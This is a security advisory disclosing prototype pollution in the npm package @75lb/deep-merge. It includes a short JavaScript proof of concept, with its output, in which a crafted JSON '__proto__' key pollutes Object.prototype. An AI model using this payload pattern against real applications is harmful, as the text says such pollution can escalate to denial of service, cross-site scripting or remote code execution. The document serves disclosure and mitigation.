All versions of this package are vulnerable to Prototype Pollution due to reliance on vulnerable merge methods of lodash to merge objects. An attacker can manipulate the prototype of an object, potentially altering the behavior of all objects inheriting from the affected prototype, by modifying the built-in Object.prototype through the reachable special properties __proto__ and constructor.prototype. Thus, the attacker can use one of these properties to pollute the application logic, which can be escalated to denial of service, remote code execution or cross-site scripting attacks.
```javascript
(async () => {
  const lib = await import('@75lb/deep-merge');
  // Parsed JSON carrying an own "__proto__" key; the merge walks into it
  const BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
  const victim = {};
  console.log("Before Attack: ", JSON.stringify(victim.__proto__));
  try {
    lib.default({}, BAD_JSON);
  } catch (e) { }
  // victim was never touched directly; its prototype (Object.prototype) was
  console.log("After Attack: ", JSON.stringify(victim.__proto__));
  delete Object.prototype.polluted; // clean up the shared prototype
})();
```
Output:
```
Before Attack: {}
After Attack: {"polluted":true}
```
This package has no security updates for the mentioned vulnerability; therefore, users should ensure proper sanitization and validation of user-supplied inputs. Blocking inputs containing __proto__, constructor.prototype
Update: Disclosed publicly following three months of no provided fix from the maintainer.